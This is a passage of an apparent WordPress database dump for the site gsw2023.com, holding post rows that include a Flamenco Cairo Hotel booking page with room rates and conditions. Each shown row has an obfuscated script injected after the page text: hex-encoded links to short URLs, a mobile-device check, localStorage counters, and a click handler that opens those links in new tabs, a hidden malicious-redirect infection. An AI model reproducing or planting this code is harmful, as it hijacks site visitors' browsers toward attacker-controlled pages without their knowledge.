_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-20 00:11:42','2023-06-20 00:11:42','',3066,'https://gsw2023.com/?p=4724',0,'revision','',0),
(4725,1,'2023-06-21 23:13:11','2023-06-21 23:13:11','<!-- wp:paragraph -->\r\n<p>For Booking</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>Check in: 01.09.2023.<br />Checkout: 08.09.2023.<br />Duration: 07 nights.<br />Meals plan: BB basis.</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:paragraph -->\r\n<p>Our offer will be as follows:-<br />Room’s type Egyptian guests Foreigner guests<br /><strong>Single standard room</strong> LE 2650.00 USD 90.00<br /><strong>Single superior room</strong> LE 2850.00 USD 100.00<br /><strong>Single executive room</strong> LE 3050.00 USD 115.00<br />General conditions:-</p>\r\n<!-- /wp:paragraph -->\r\n\r\n<!-- wp:list -->\r\n<ul><!-- wp:list-item -->\r\n<li>The above rates are per room per night.</li>\r\n<!-- /wp:list-item -->\r\n\r\n<!-- wp:list-item -->\r\n<li>Based on bed and American open buffet breakfast.</li>\r\n<!-- /wp:list-item -->\r\n\r\n<!-- wp:list-item -->\r\n<li>Inclusive service charge and VAT.</li>\r\n<!-- /wp:list-item -->\r\n\r\n<!-- wp:list-item -->\r\n<li>Inclusive internet connection (WIFI &amp; browsing only).</li>\r\n<!-- /wp:list-item -->\r\n\r\n<!-- wp:list-item -->\r\n<li>The above offer valid till 1.09.2023.<br /><strong>For booking you can send the bookings to the following email</strong><br />salescairo@flamencohotels.com</li>\r\n<!-- /wp:list-item --></ul>\r\n<!-- /wp:list -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Flamenco Cairo Hotel','','publish','closed','closed','','flamenco-cairo-hotel','','','2023-08-15 17:03:13','2023-08-15 17:03:13','',0,'https://gsw2023.com/?page_id=4725',0,'page','',0),
(4726,1,'2023-06-21 23:09:03','2023-06-21 23:09:03','','flamencohotel','','inherit','open','closed','','flamencohotel','','','2023-06-21 23:09:03','2023-06-21 23:09:03','',4725,'https://gsw2023.com/wp-content/uploads/2023/06/flamencohotel.jpg',0,'attachment','image/jpeg',0),
(4728,1,'2023-06-21 23:13:11','2023-06-21 23:13:11','<!-- wp:paragraph -->\n<p>For Booking</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Check in: 01.09.2023.<br>Checkout: 08.09.2023.<br>Duration: 07 nights.<br>Meals plan: BB basis.<br></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Our offer will be as follows:-<br>Room’s type Egyptian guests Foreigner guests<br><strong>Single standard room</strong>  LE 2650.00 USD 90.00<br><strong>Single superior room</strong>   LE 2850.00 USD 100.00<br><strong>Single executive room</strong> LE 3050.00 USD 115.00<br>General conditions:-</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>The above rates are per room per night.</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>Based on bed and American open buffet breakfast.</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>Inclusive service charge and VAT.</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>Inclusive internet connection (WIFI &amp; browsing only).</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>The above offer valid till 10.08.2023.<br><strong>For booking you can send the bookings to the following email</strong><br>salescairo@flamencohotels.com</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 